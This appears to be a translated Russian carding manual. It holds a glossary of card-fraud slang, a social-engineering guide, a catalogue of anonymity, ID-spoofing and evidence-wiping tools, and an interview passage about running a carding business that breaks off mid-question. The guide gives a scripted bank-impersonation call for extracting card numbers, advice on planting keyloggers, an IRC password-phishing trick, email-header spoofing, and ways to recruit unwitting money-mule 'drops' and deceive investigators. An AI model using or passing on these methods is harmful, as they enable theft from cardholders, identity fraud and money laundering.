FRAUD (scam) - illegal transactions carried out using plastic cards and their details.
HAVE, RUN - copy, modify or block a computer program, database or confidential computer information.
ELITE (ELYTE) - professional carder, "authority".
YUZVERI, YUZERY (from the English "to use" - user) - holders of plastic cards; clients of electronic payment systems; users of the computer network "Internet". Embosser is a device for extruding symbols on the map.
Card printer - a printer for printing information (pictures) on a card.
Track (Road) - part of the dump with specific information each. 1st track - information about the cardholder, 2nd track - information about the cardholder, about the bank that issued the card, and so on, 3rd track - one might say, spare, used by stores to award points and other things.
Dump - information that is written to the magnetic stripe of the card consists of 1,2 or 3 tracks.
White plastic is a piece of clear plastic on which information is applied.
Billing (from the English bill - account) - payment, payment system.
eBay is the name of the eBay auction [and: 'bay].
Merchant - merchant account, online trading system.
Transaction - a deal, a posting to accounts. drop - the general name for someone who accepts "dirty" goods or money, they are professional (they are aware of what they are doing) or victims who are not aware of what they are doing.
Stick (PP, Palka) - PayPal money transfer system;
Real plastic is a fake credit card that can be used for purchases in real stores. Such a card is a kind of duplicate of a real-life credit card somewhere.
Enroll (from the English enroll) - linking a credit card of a bank account to the online, with the ability to change their data via the Internet.
Access Control Cards
Plastic cards used to organize access to premises are usually in the form of magnetic stripe cards or contactless smart cards.
Acquire - A bank or other financial institution that has entered into an agreement with a trade organization to accept payment cards and is responsible for paying the bills of cardholders.
Authentication - Technology of identification in an automated information system
Authorization - Authorization, payment request. Blocks money in the account, reducing the free (Open to Buy) amount for purchases. To withdraw money, you must complete authorization, see Settled. If authorization is not completed within the time specified by the issuer (see Issuer), it is canceled and the previously blocked amount is released for purchases
Batch - A set of transactions saved for simultaneous payment, which usually occurs once a day.
Batch can be completed both automatically and using a POS terminal
BIN - Bank identification number - a unique number assigned to the bank by the payment system for issuing and acquiring plastic cards.
Encoding - the process of writing information onto the magnetic stripe or memory chip of a smart card.
Factoring - A situation where your own Merchant Account is used to receive additional payments for another merchant. Factoring is considered an illegal operation. To legalize Factoring, special legal schemes are needed, as, for example, in CCNOW.
Holdback - Part of the funds received by the merchant from card payments, blocked by the acquirer or another MAP to cover the costs of chargeback and other controversial payments. After a certain period of time, the Holdback is returned to the seller.
Slip is a synonym for the word check in relation to card payments.
Chargeback - a protest by the cardholder's bank of withdrawing money from his card.
1. An adult-only site, a porn site;
2. Direction of work in carding.
Auk - abbreviated. from auction.
billing (from the English bill - account) - payment, payment system.
merchant - merchant account, online trading system.
cc, ss - credit card.
ccv (short for Credit Card Verifier) is an additional security code in a credit card.
dump - information from magnetic tape or credit card chip.
Carding (the term first appeared on the Russian Internet in the early 90s of the last century
1. (legal definition) a type of fraud using plastic cards or the information they contain. How a crime refers to highly intellectual or so-called "white-collar";
2. (economic and political definition) voluntary and forced redistribution of funds from banks of countries with a high concentration of speculative capital to active economic entities with a high concentration of intelligence;
3. (philosophical definition) mental dexterity and no fraud.
Transaction - a deal, a posting to accounts.
Holder - the real owner of a real credit card.
Drop - the general name for someone who accepts "dirty" goods or money, they are professional (they are aware of what they are doing) or victims who are not aware of what they are doing.
Dirt, dirty money goods - money or goods, the illegal acquisition of which can be traced;
Clean or "laundered" commodity money - money or goods, the illegal acquisition of which cannot be traced;
Cardboard, potatoes - data of a real-life credit card somewhere, which are used by the carder, as a rule, only for transactions via the Internet;
Cash - 1. cash; 2. the process of transferring money from a non-cash form to cash, cashing; 3. see also "washing".
Pour - cash out;
laundering - the transformation of "dirty" money into "clean" money, that is, those whose illegal origin is impossible or extremely difficult to trace and prove; breaking the connection between money and its illegal origin.
Real plastic is a fake credit card that can be used for purchases in real stores. Such a card is a kind of duplicate of a real-life credit card somewhere.
Spam - sending letters by e-mail in unlimited quantities.
Socks, socks-proxy (English socks-proxy) - an intermediary server between your computer and the final server site, used to hide your IP address.
Shopping (from the English shopping) - purchases or a series of purchases in a store.
Enroll (from the English enroll) - linking a credit card of a bank account to the online, with the ability to change their data via the Internet.
Some common English. abbreviations
DL - driving license
ID - identity document
DOB - date of birth
SSN, Social Security Number is a government number that is assigned to each resident of the United States for taxation and cash flow accounting purposes, including credit. stories
SIN - Canadian SSN counterpart
MMN - mother's maiden name
PIN, personal identification number - analogue of a password, consists only of numbers and is used for authorization.
This section of carder's art is very important. Most break-ins do not happen without the help of social engineering, and it is she who sometimes determines the failure or success of an operation. In fact, for some operations, social engineering is the only thing that is needed to carry them out.
Social engineering
Social Engineering (Social Engineering) is a science with the help of which people are managed against their will and wishes. It was invented by phreakers a long time ago: twenty or thirty years ago. By the way, Kevin Mitnick and Rossko were very famous SI specialists.
This article will use an interpretation that applies solely to computer security. That is, now SI is a way of illegal access to secret or personal information by deceiving people. Discreet, but clear. Usually, the goal of a SI attack is one - to get the password necessary to access some secret database, recently the SI goal is often the credit card number of an unlucky user.
The simplest SI attack is divided into 3 phases: sabotage, advertising, and help. With sabotage, everything is simple, a carder hacker simply disrupts the victim's computer in any way. It can be either a commonplace virus on a floppy disk or in a letter, or a good attack on a host from the Net. After the computer is bent, the second stage of hacking begins: advertising. Here, the carder informs the victim by all available means (paper ads, mutual friends, ICQ, spam) that it is he who will be able to bring the untimely deceased OS back to life. And only the next step is directly help. Under "help" carders mean computer recovery, during which the necessary information is lured out of it, imperceptible for the user. We'll talk about ways to help a little below, but now let's look at places where SI-class attacks are usually carried out.
I would know where you will fall
The favorite tools and methods of carders conducting such attacks are widely known: telephones, both regular and cellular, personal meetings with the victim, letter - an ordinary paper or message on soap, various chats on the network (ICQ, IRC, banal web-chat). Next, I will try to outline the main subtleties of each.
Phone - Carder Tool
Let's start with the oldest, but still actively used method: communicating with the victim on the phone.
Here are the main advantages of this method:
- Quite high anonymity, especially when using the left line with anti-AON or calling from a payphone.
- High efficiency, which is explained by the ability to introduce himself as any person, and, if he has the skills, the attacker will not notice the catch.
- Quick results - the carder does not need to wait until the letter arrives or the Internet, which fell due to a thunderstorm, returns. When using a mobile phone, we get complete freedom, which is important in working days. This is where the advantages of social engineering using the phone end and the negative sides begin.
The biggest problem is your voice, especially if the person on the other end of the line knows very well who the intruder claims to be (for example, the manager of bank X). There is a need to change the voice by any means. If it is not possible to find the tone, then the attacker often tries to refer to the disease (although I doubt that a healthy person an hour ago could suddenly get sick with laryngitis with a complete loss of voice). Further, there is the background problem - it is impossible to achieve absolute silence in any organization, especially in banks (I often talk about banks because carders often pretend to be high-ranking officials of the attacked bank). And this means that if someone calls in the midst of the working day and there will be deathly silence in his "office", then the carder will not be believed or suspected that something was wrong. Hence, one of the following tricks must be applied: a telephone that generates office noise, a recording from a real work office, or broadcast via
radio bugs from another organization (chosen very carefully). We got acquainted with the technical side of this method, we move on to the most radical and dangerous one - a personal meeting.
Connect on TET-a-TET!
Meeting with the victim, so to speak, tet-a-tet, has both obvious disadvantages and obvious advantages. The disadvantages include the fact that the carder may be remembered, therefore, he must find time and prepare very carefully - from clothes to hair, everything must correspond to the image of a respectable business person (it is unlikely that a shaggy and unshaven beggar can inspire confidence). As you can imagine, behavioral problems follow from this - the carder must control his emotions and conduct a conversation in the "correct" language, without using slang, the effect of which is exactly the opposite.
Distance also plays an important role - when attacking with the help of a phone, the burglar can be thousands of kilometers from the victim and achieve results without problems, and to meet him he will have to come to the city of the attacked. Despite these shortcomings, SI is in no hurry to give up positions during a personal meeting, since this method is not devoid of advantages - during communication, the carder sees a person, which means that he will easily understand whether he believes him or not. This allows you to instantly adjust the attack tactics. Professional carders have a lot of small psychological tricks in stock (you can get acquainted with some in the sidebar) that dramatically increase the efficiency of their work. And true gurus not only have psychological training behind them, but also master the techniques of hypnosis, which allows them to achieve almost one hundred percent effectiveness without leaving a trace.
Further I will tell you about the methods that have appeared quite recently, but have already received considerable distribution. Our mini-review of the SI Internet means opens with a simple e-mail. It is with the help of messages by e-mail that many attacks are carried out aimed at obtaining not only your credit, but also personal information of a more intimate nature. I would even say that most of these attacks were carried out using e-mail, since it allows you to handle several people at the same time without any problems.
The network helps us to card and live
In essence, such an attack is quite simple - the carder communicates with the victim from the left mailbox and tries to fetch the necessary information. For all its simplicity, it is necessary to take into account some of the subtleties associated with the mail program and letter headers. So, first you need to find out which mailer is used by the person for whom the cracker impersonates. To do this, it is enough to get any message from the victim and, looking at the headers (in the Outlook - "letter properties", in baht - "F9", and in mail, click on V), find out the value of the X-Mailer field. You also need to try to ensure that the headers of the letter do not contain information that can give out an attacker with giblets. And although ordinary people are unlikely to check where the letter came from, insurance has not bothered anyone yet. So, the main problem is the IP address of the message sender. It was with his help that the first novice carders were caught. In order not to be among them, when sending their messages, carders use one of the following methods. The first is a simple reconfiguration of your mailer to a different name and a different server, it is better to use a profile system for each victim, so as not to go into the settings every time. The second method is also simple - to find a program that allows you to fill in the service fields yourself, but here the carder tries by all means to get access to the real mail server of the substituted chela. But the third one guarantees very high efficiency, albeit with some expenditure of the brain resources of the carder. To perform sabotage, you should use a simple terminal (the standard one from Windows is 100% suitable) to connect to the SMTP server on port 25 and dictate all the fields from the terminal. Programs such as Anonymity Mailer also help).
/ dev / hands / mozg go to battle!
Now let's move on to how the SI attack is used in real life. The first common method is a phone call, as a result of which there is something like the following dialogue between the carder and the victim:
-Karder: Hello, is this Vasily Lokhov?
- Victim: Yes.
-K: I am Ivan Ivanov, manager of the department for work with plastic cards of bank Ch. Yesterday we received a request to transfer $ 1053 from your account to the account of an online store, which is on our black list (more water and cool!). Our bank is very worried about its customers, and therefore we ask you to confirm the transfer of money.
-Zh: A ... U ... I ... I didn't buy anything ...
-K: Hmm. Strange situation. Did you give your credit card number to anyone?
-J: No.
-K: Then, perhaps, this is a bug of our software ... only 3 days ago we switched to a new version (the bank is cool, keeps pace with the times). Give your card number and expiration date, we will check and report the result. If this is a mistake on our part, then your account will be restored.
-J: Now-now. 987654321 01/04.
-K: Thank you, now the check will be carried out. Do not carry out payment transactions with a plastic card of our bank within 2 hours. Bye!
-J: Goodbye.
After such a conversation, it is highly desirable to call and reassure the user that everything is fine, his account is safe and sound. If the victim is a simpleton, then he will not run to the bank and ask manager Ivan Ivanov about software errors. And after a while, with horror, he will discover the devastation of his personal account. And if the carder realizes that the victim is very suspicious, then he tries to make all purchases instantly, or never at all (if the attacker finds out that there was no mistake and that Ivan Ivanov has been basking in the Canaries for 3 days, he will definitely block the card).
And also like this
The next method was found quite by accident. Its implementation does not require large expenses, and there is not so much SI here. Imagine the following: there is an Internet store (let it be absolutely any, we will not break it), in this store the victim buys any product, and you have the number of his credits! How? The secret of the trick is simple: you put a Trojan / keyboard logger on his car and, as soon as you get the required number, destroy all traces. And the task of social engineering here is to persuade a person in any way to buy something in this particular store according to YOUR credentials. Answer all the questions that your credit card is empty, and you are not paying ... well, if only because you want to get another one, or your girlfriend demands a lot of cash at once (it passes - checked). And be sure to promise to reimburse (and reimburse!) All cash costs, plus treat yourself to a beer, to remove suspicion from myself. But for all its simplicity, there is a small catch: if the victim does not immediately begin to carry out operations with the credit, it will be difficult for you to find the number in the heap of entered characters. Therefore, go to the purchase page of this store yourself, find the required fields and remember, it will be easier to search for them.
While you are looking for a victim, I will tell you about one more method. Now our scene is IRC channels and networks. If the person whom you want to substitute uses irka, then you have all the cards in your hands, go for it.
Irka. How much of this word has merged for the heart of the carder
First, let's find out the victim's IRC password, or rather, she will tell us it herself. Preparation is minimal: 2 running IRC clients on your computer, with one bot, and the second any nickname (from under it you will engineer), and your nickname must have the rights of a channel operator, at least temporarily. After that, the SI attack on the user / users begins, which consists of the fact that you whisper (or utter for the whole chat) that in order to obtain operator rights, it is enough to send a message to the channel bot. But those who have never been an operator (do you feel the catch?) Need to identify their IP and DNS. To perform this operation write / msg bot identify your_irc_password. The robot will carry out all the settings and will meet you with a password. And then you need to prepare a retreat: you tell everyone or only the channel operator that you are leaving and, possibly, you will not show up for several days due to departure. Then, tearfully saying goodbye to everyone... you close the second IRC client. And the first, with the bot, you do not touch. It remains only to wait for the receipt of the user's password in its pure form. Further, because you are now a robot, you need to send an authentication notification. And only after that you can safely disconnect from the channel. And then you start trying this password for other IRC channels, local web chats and even ICQ. Many people have only one password for many personal resources, explaining this by their unwillingness to memorize a lot of "unnecessary" information. Well ... let them pay! And then, using the password found, you begin to carry out an SI attack on the victim's acquaintances, the purpose of which is the same credit.
How it all ends
I also have to tell you about how the victim can behave during and after the attack. Usually everything goes smoothly, but he who is forewarned is armed.
- The victim, suspecting nothing, falls for your sabotage. Even comments are unnecessary here ;-). You just enjoy the fruits of the attack and don't think too much about anything. All work after the attack comes down to only periodically checking how the victim is doing with the credit, and finding out if he noticed problems. The most favorable option for a carder.
- The attacker is smart enough and does not succumb to your tricks. In such a situation, the carder has a choice: try other methods or lag behind this chela. If you choose the latter, then keep your friendship with the former victim. And if you are a warlike Indian and do not think to bury the ax of war, then go for it! Although difficulties come with each new visit, since the victim sees that you are showing increased attention to her person. I repeat once again, you need to be extremely careful when repeating attacks. Just remember that greed has ruined the fraer.
- The owner of the credits of the glades, that they really want to dissolve him on credit, but did not apply anywhere. Such an outcome, of course, is bad, but not fatal - nothing threatens your freedom, although rumors may spread about your dirty politics. This will ruin your reputation, so try to react at the first displeased screams of the victim and fix everything on the spot. You can pretend to be a fool who never planned anything. And comfort yourself that nothing is lost yet.
- The former friend not only realized that they were trying to throw him, but also turned to where he should be with a statement (it happens that he also has friends there). This is no longer very good, although the deadline is also far away. In order not to bring this moment closer - be law-abiding, do not break, just remember - you can be at gunpoint. After about six months, you can take up the old, but with redoubled caution. But if they have already come to you - tie up with carding, they have something significant for you. And most importantly, never part with SI science, even during interrogations. The main reason for the death of young talents on the bunk is simple: they forget that investigators are also people, albeit disguised in uniforms. This means that you can apply carder tricks to them. True, in police schools, psychology is also taught, but who remembers what he was taught at the university?
Psychological tricks of the carder!
The tricks that I will tell you about are used by many people - carders, hackers, psychologists, managers, and other deceivers. I am sure that they will help you not only in hacking, but also in your personal life.
- If you want to influence a person's feelings - speak into your left ear, logic - into your right, but keep in mind that a drunken person who heartfeltly asks for a credit number is unlikely to succeed!
- Talk to the object in a language familiar to him. So, if this is a simple person who knows little about IT and, in particular, about credits, do not use jargon. It is better to explain your thought in his language five times, but they will understand you, and there will be no break in the conversation.
- Memory works best between 8-12 a.m. and after 9 p.m., and worst of all - just after lunch.
- Unfinished actions (conversation, contract approval, meeting) are remembered twice better than those brought to the end.
- Science has calculated that a person says only 80% of what he wants to communicate, the interlocutors perceive 70% of this, and understand - 60%, will remember from 10 to 25% of all information. Therefore, load and do not regret it.
- To make the victim imbued with your thought, repeat its main theses as often as possible, but do not overdo it! And then you will just say: "Give me the number of the credits!"
- Try not to ask openly, let the person understand what you need and offer himself.
- Responding to any harsh statement, the victim can easily betray himself with giblets, so bewildered and puzzled.
- All people have the basic hypnotic ability, especially those with a strong will, so if you are trying to convince a person, try to look at the bridge of his nose and think about what you are talking about.
- Age affects the human brain, for example, young people think better in the evening, and retirees in the morning.
- Many questions that require a "yes" or "no" answer confuse the speaker with the previous thought, so if you are suspicious, use that.
- Some people can be summoned to a frank conversation only by showing that you do not believe them.
- When proving your case, use only facts and theses that the subject can understand.
- Try to look like a knowledgeable person in your field, ordinary people instinctively gravitate towards the smarter and more knowledgeable.
- A phrase pronounced for more than 5-6 seconds without pauses ceases to be perceived.
- It is useful to give individual statements the form of a neutral question (for example, rhetorical), then your interlocutor will not feel pressure and will be able to perceive such a presentation as his own opinion.
Everything. My article is finished, I hope you were interested, and you learned something new about the life of carders - social engineers.
Security software
Proxy
Proxifier
Proxifier is a program that allows network programs that do not have the ability to work through a proxy server to bypass this limitation. With Proxifier you can work with any Internet clients (browsers, ftp, ICQ, IRC, Kazaa, Telnet, ssh, video and audio, games, etc.) from a network that is separated from the Internet by a firewall (only one open port is required ). Proxifier will help ensure the secrecy of your information, send and receive e-mail through a proxy server, or a chain of proxy servers. All email clients are supported (Outlook, Eudora, Netscape and others). The program is very useful and, most importantly, it works!
Off site proxifier.com Proxifier - Bypass firewall and proxy, tunnel connections through an HTTPS and SOCKS proxy.
FreeCap A
Utility that allows you to transparently redirect connection requests from programs that do not have native SOCKS proxy support. SOCKS protocols v4 and v5 are supported, it is possible to work through a chain of SOCKS servers (SOCKS Chain), as well as direct connections to certain ports. Full support for RFC 1928, 1929, 2817 standards (SOCKS v4 and v5, authorization for SOCKS5 and HTTP CONNECT).
Off site: freecap.ru - FreeCap Homepage.
WideCap 1.5
System Poxifier. Continuation of the FreeCap program.
Off site: widecap.ru WideCap Home.
SocksCap_2.40
Allows almost any application to work through the socks5 proxy.
Setting up the SocksCap program will not be difficult, because it supports the drag & drop method - to add applications that need to be allowed to access the Internet, you just need to drag their icons into the SocksCap window. Controlling the launch of programs that go online through the socks5 proxy is just as simple: just right-click on the SocksCap icon in the system tray and select the required program.
In details: sockscap.ru
SocksChain
A program that allows you to work through a SOCKS chain or HTTP proxies in order to hide the true IP address. SocksChain can work as a regular SOCKS server, broadcasting requests along a chain of proxies, it can also be used with client programs that do not support the SOCKS protocol, but work with a single TCP connection, for example TELNET, HTTP, IRC ... (FTP uses 2 connections). At the same time, your IP-address will not appear in the server logs or in the headers of mail messages.
Setting up SocksChain:
1. Add a proxy, there are two ways:
a) File -> Import -> Your proxy list (you can take it from any public)
b) Tools -> Proxy manager -> Add -> Paste from clipboard -> OK
2. The proxies have been loaded, you need to check them:
Tools -> Proxy manager -> Test all
If there is a light bulb next to your proxy, it means ok, the proxy is working, if the circle with a cross means the proxy is dead (well, everything is clear, you need to look for more).
3. Set up our chain:
Service -> Modify (a window appears, go through the points)
Name: Chain
Incoming port: 1080
Auto-creating chain: check the box
Change the chain every: write a larger number, for example, 99999999
Chain Length: here you can specify the number of proxies in your chain, the more proxies in your chain - the safer, but the speed also decreases noticeably, I recommend from 1 to 3
Below is a small window, your chain from the proxy will be displayed here, the number in the column " Chain Length "must match the number of proxies in this small window, ie. if you set Chain Length to "2", then there should also be two proxies in the window.
On the right is a list of all your socks / proxies, in order to add a proxy to the chain (in that little window), click on the proxy (i.e. select it) and click the Add button, if you need, for example, 2 proxies in the chain, repeat act. Below there is another small window, we are not interested in it, it should be empty (if there is a sox there, delete it with the Delete button). Click OK.
4. Tools -> Options -> General
Number of threads: 30 (choose yourself)
Time-out: 99999 s (choose yourself)
Sessions time out after 99999 seconds of inactivity: (choose yourself)
Enable connections only from localhost (127.0.0.1) (
check ) Save Log to file SocksChain.log (can be checked, can be unchecked)
Fast disconnect (uncheck)
Tools -> Options -> General -> Proxy check Directly and Resolve domain names locally
Tools -> Options -> Upgrade check Enable Interaction with site. Click OK.
That's it, SocksChain has been set up.
checking HTTPS / SOCKS proxy servers
Socks_checker 1.3.1 or Ultra Socks Checker 1.0
The programs is designed to check HTTPS / SOCKS proxy servers. The program allows you to check HTTPS (CONNECT), SOCKS4, SOCKS5 proxy servers; take proxy lists from both text and HTML files of various formats; check proxy lists of any size; check proxies for connections to IRC networks or to mail servers.
Change ID
ID-Blaster Plus A
Utility for quickly changing Windows Product ID, UserID, Internet Explorer ID and Windows Media Player ID. Given that this data is potentially insecure, as it is unique for each computer and therefore can be used to track user actions, the ability to change it can increase the level of privacy.
ID-Blaster Plus works from the system tray - click, and a list with previously entered "fake" data opens.
CCtools
v. 1.5 eng
Change OS ID, change IE ID, change WMP ID, change Hostname, change the name to which the OS is registered, change the company name to which the OS is registered, change the processor name, change the system build, save all current IDs to a file with the ability to download them into the program, functions for generating all IDs (there is nothing to write manually). Developer site: xfq.jino-net.ru/features.html
RMOSChange 2
The program changes the HTTP headers of Internet Explorer, Firefox, Mozilla, so that the server will not be able to find out what OS you have installed, browser version and system language. By the way, the proxy only hides the IP address, but no more. You can choose for yourself Linux, SunOS, MacPC, Win 2003.
STZ Blaster
To change the computer ID, time zone, etc.
Cleaning the system
CCleaner
This utility is designed to clean up system junk. In the course of its work, CCleaner (Crap Cleaner) searches for and removes temporary and unused files. This includes: cookies, IE browsing history, temporary Internet files, search strings, Trash files, etc. It also supports searching for temporary files of third-party applications: Firefox, Opera, Media Player, eMule, Kazaa, Google Toolbar, Netscape, Office XP, Nero, Alcohol 120, Adobe Acrobat, WinRAR, WinAce, WinZip, GetRight, Morpheus, Download Accelerator Plus, VirtualDub , ZoneAlarm and many others.
Evidence Eliminator 6.01
Protective tool that allows you to quickly and efficiently remove information that outsiders do not need to see. This can be information about the sites you visited, what documents you worked with, what files were on your computer, etc.
Eraser
A tool for securely erasing files that allows you to completely erase data from your hard drive by overwriting complex patterns multiple times so that the erased data cannot be recovered. You can simply drag and drop files and / or folders onto the appropriate icon, use the Windows menu by right-clicking, or use the built-in scheduler to automatically erase unused disk space, cache files, etc.
Developer site eraser.heidi.ie - Eraser
Encrypt the info
TrueCrypt 6.3
Allows you to create virtual encrypted disks, which can then be used as regular logical disks on the system. Valid encryption algorithms: AES (256-bit key), Blowfish (448-bit key), CAST5 (128-bit key), Serpent (256-bit key), Triple DES, Twofish (256-bit key). As an encrypted storage ("disk"), you can use either part of the free disk space or one of the available hard disk partitions, as well as flash cards, floppy disks and other removable storage devices.
Another feature of the program is the absence of a specific signature in the header of the created "disk", which is typical for other similar programs, which makes it impossible to identify a TrueCrypt disk. no part of the virtual disk is different from random data. The sources are available on the home page.
The archive contains the latest version of the program and the Russification file.
Beginner's Guide: tech.pp.ru/trans/truecryptrus/ - TrueCrypt documentation in Russian
Developer site: truecrypt.org TrueCrypt - Free Open-Source On-The-Fly Disk Encryption Software for Windows 7 / Vista / XP, Mac OS X and Linux
Secustar DriveCrypt Standard
Securstar GmbH has released a new final version of DriveCrypt 4.10 for encrypting both data and partitions of HDD disks.
It is currently one of the most reliable and effective data encryption programs.
SecurStar DriveCrypt 4.1 is an effective means of reliable protection of confidential information using reliable encryption algorithms (1344Bit Military Strength Hard Disk Encryption), as well as DriveCrypt provides the user with steganography functions, i.e. it can hide the user's container with secret files in audio files.
BestCrypt Volume Encryption
provides transparent encryption of all data stored on hard and removable devices, automatically as soon as the data is touched by Windows or any other programs. In the case of encryption of the system or boot partition, the BestCrypt Volume will not allow the system to boot without entering the required password. The program uses an encryption mode for LRW disks and modern and encrypted advanced or high-speed encryption algorithms with a maximum key: AES (Rijndael) -256; Blowfish - 448; CAST - 128; GOST 28147-89 - 256; RC6 - 256; Serpent - 256 and Twofish 256-bit. In addition to entering the password as the most vulnerable point, the program offers the use of USB hardware keys as a highly secret storage of encryption keys. With USB dongles, the user gains two levels of protection for encrypted data, since along with entering the password, a small USB hardware device must be connected to the computer where the encryption key is stored. In addition, the entire system is automatically encrypted when it goes
into "hibernation" mode and BestCrypt Volume Encryption supports several rescue functions that allow the user to decrypt volumes if a serious disk breakdown occurs.
Carder software.
When the media report on the capture of another carder, the first thought is that the burglar most likely neglected his own safety. If you do not want to be in his place, take care of your anonymous existence.
Proxy server.
All types of proxy servers are usually divided into three categories: gateways, caching, and anonymous proxy servers.
Gateways are most commonly used by LAN administrators. Do not give each user a "personal" access to the global network, so they set up a proxy server to satisfy many users at a time. But hence its peculiarity - not a single external network node can establish a connection with the client, since the proxy server does not understand which user this request is intended for. And therefore, when working with a gateway, only one type of connection is possible - from client to server.
In this way, admins restrict users - many programs (for example, ICQ) will not work, since they require a two-way connection. But a huge plus is increased security.
The second type of proxy server is caching. Its use (voluntary) significantly speeds up page loading, especially when connecting to highly congested servers or on a bad line. The idea is clear - the server stores any data it receives on its disk (in the cache), and if the resource requested by the client is already in the cache, it is "given" without contacting the remote server. The scheme is not suitable for frequently updated resources, but smart caching proxies are able to re-access remote servers over time, check the resource for changes and, accordingly, update their cache.
The last type of proxy is anonymous. They send a request to receive data on their own behalf, without disclosing the user's IP. They are what you need.
Why is it needed.
Anonymous proxies allow you to hide your real IP address when manipulating the Internet and during everyday web browsing, downloading software, etc. In addition, most programs (IE, Opera, ICQ, Reget) can work with proxy servers. The benefits of using this bundle are undeniable - no one will ever know your true IP address, which will help to avoid the heavenly punishment, as well as cut off all kinds of outside attacks on your computer.
Looking for proxy servers.
They search for proxy servers in two ways: in search engines or through special software. The simplest and most common search is old-fashioned, in popular search engines such as
www.rambler.ru,
www.google.com,
www.yahoo.com, etc. You go to any of them and enter "proxy" + "sheet". The result is before my eyes: a bunch of links, which you can rake all your life (if you have free time), and there is a high probability of getting broken links.
Pros: Availability and ease of use.
Cons: Most of the results obtained are proxy servers not usable. Due to the popularity of the method, most proxies are "dead", their speed leaves much to be desired.
Another method is to use software that is specially tailored for searching for proxies on the internet. One of these programs is Proxy Hunter. All you have to do is enter a range of IP addresses to check, and the program will do the rest. Intuitive interface, ease of use, ease of setup and many more useful features - all this is about Proxy Hunter.
Pros: ease of use, the ability to get visual results. Cons: on dialup you will have to wait pretty long.
Checking proxies for anonymity.
Actually, the most important thing is not to find an anonymous proxy, but to make sure that it is really anonymous. Otherwise, prove later in remote places that you are not a giraffe (read the Criminal Code of the Russian Federation?).
And again the options. The first one - again through web resources, and the second - the Proxy Checker software. Download, install, and ProxyChecker is ready to go. For ease of operation, the program can be eaten with the request "IP: port", after which you can sit back and, sipping hot tea, wait for the results of the work. The program is smart and can process several requests in parallel and wait for the connection at the next disconnection (dialup people will understand me). Conveniently, when checking a proxy for anonymity, next to the verified candidates, their speed is indicated. In general, gold, not a program. For comfortable work, you need to register the program, otherwise it will stop working after 7 days or after 50 starts.
We put the browser on the proxy
Setting up any browser to work with a proxy is much the same, so I will show it using the example of a popular browser from Microsoft under the modest name Internet Explorer.
In the "Tools" menu, select "Internet Properties".
In the dialog box that opens, go to the "Connection" tab.
Press the button "Configure local network", then mark the CheckBox "Use a proxy server" and in the "Address" line enter the IP address of the proxy, and in the "Port" line - respectively the port (usually 80 or 8080).
That's all, the overwhelming setup process is over.
Software.
There is more than enough software, we will focus on two verified copies: SurfNow Professional and Anonymity 4 Proxy.
SurfNow Professional (9x / Me / NT / 2k / XP)
At the first launch, the program simply captivates the user - the height of aesthetics. The main feature of the bloomer is the system for finding new proxies. Now you do not need to painfully go to security sites in order to steal a not yet "used" proxy from under your friend's nose. SurfNow will do everything for you (it's a pity, he doesn't iron his pants and doesn't cook dinner - editor's note). The program gives pleasure in three ways: search for proxies using google, pull a list from a given file, or, finally, "parse" a specific url for IP addresses.
To make sure that the proxies have not "died", the software immediately checks them for anonymity, which, you must admit, is very convenient. Also, the developers have not forgotten such necessary features as changing proxies "on the fly", the ability to add verified fighters to the list, etc. The program has ONE drawback - it is paid, contact an astalavist.
Anonymity 4 Proxy (9x / Me / NT / 2k / XP)
This "harvester" appeared a long time ago, but is constantly updated, becoming more attractive with each version. The capabilities are similar to SurfNow, so make your own choice.
Painful end Read the Criminal Code of the Russian Federation at night and always take care of your safety (not only on the internet).
Anonymizers.
There are special services in the internet - anonymizers. Basically, these are web interfaces of anonymous proxies. You go to the anonymizer server, enter the required address, and after a while the required resource is loaded. At the same time, you can be sure of your privacy.
The anonymizer acts as an intermediary between you and the viewed site with which you are connecting. As a result, you are absolutely anonymous - neither your location, nor your provider, nor your true IP-address is known, in a word, beauty. In addition, some anonymizers are able to block malicious scripts and programs.
Everything is great, but the main drawback of the anonymizer is that it significantly slows down the page loading speed. The second disadvantage of these sometimes useful services is that you have to pay for them. Only "young" anonymizers who are just promoting their services are free. Some anonymizers still give free access, but all requests come with a time delay. For example,
www.anonimizer.com has about 30 seconds. Another similar option is
www.safeweb.com. In principle, there are enough of them in the internet, go to any search engine and enter "anonymizer" and "anonimizer".
Separately, I can please the craftsmen - in the internet you can find the source codes of anonymizers and stir up your own, perhaps only for your beloved. For example, the source code of the once popular anonymizer Freedom Network is now distributed free of charge -
www.theregister.co.uk/content/55/24094.html.
All types of proxy servers are usually divided into three categories: gateways, caching and anonymous proxy servers.
Anonymous proxies allow you to hide your real IP address when manipulating the Internet and during everyday web browsing, downloading software, etc.
They search for proxy servers in two ways: in search engines or through special software. The simplest and most common search is old-fashioned, in popular search engines such as
www.rambler.ru,
www.google.com,
www.yahoo.com, etc.
The program gives pleasure in three ways: search for proxies using google, pull a list from a given file, or, finally, "parse" a specific url for IP addresses.
Carder's business secret.
There are many complexities and nuances in any business. Kardersky is no exception. Your dedication alone is not enough for the implementation of such a profitable business as clothing carding. As practice shows, in order to get out of the water, you first need to gain experience and only then put your plans into practice.
I decided to interview a well-known in narrow circles JensMiller. This person really knows how to build his own business and what is required for this.
JensMiller, the traditional first question: what is the essence of clothing carding, and why has it gained such popularity?
The fact is that clothing carding is one of the most interesting and at the same time accessible trends. If a person knows what he is doing and has good employees under his command, his business will go like clockwork. The main thing is to find a suitable victim and watch out for safety.
This is in theory. How can this be achieved in practice? What kind of workers will be involved in the carder's business?
In general, in order to more or less centralize his business, the carder needs to find experienced drops, edgers and high-quality cardboard. And only after that you can perform any carder actions.
Drops? Something I have not even heard of such a profession. Who are these people, and where should you look for them?
Drops are simply those who stick their butts and cash checks. In addition, the drop is engaged in the acceptance and marketing of goods. Ideally, such a person should bring real money to the carder, and, accordingly, receive a certain percentage of them. As for the search, these people are mainly searched for on work forums or are recommended by familiar carders.
What do the beaters do?
Drivers are only engaged in driving in information about the card in online stores or auctions. They play a huge role in the life of a carder, especially when he is too lazy to drive in data himself. These are, as a rule, novice carders who get pretty good money for their work, and also gain experience. Experience in carding is an irreplaceable thing.
I would like to know the real salary of such subordinates.
If the driver gets a certain amount for each successful drive (and he implies a successful deal), he is given from 2 to 5 $ (so I pay). With a drop, a percentage of the deal is calculated. When this is a proven recommended person, 40-50% is dumped for him. If the dude was found on the forum, then, perhaps, he himself does not suspect that he is a drop. In this case, the salary is penny - 5-10% of the transaction. Although this also depends on the fraud being carried out.
With this, everything is clear. Let's go back to the third condition - quality cardboard. Where can I get valid credit cards and how much do they cost?
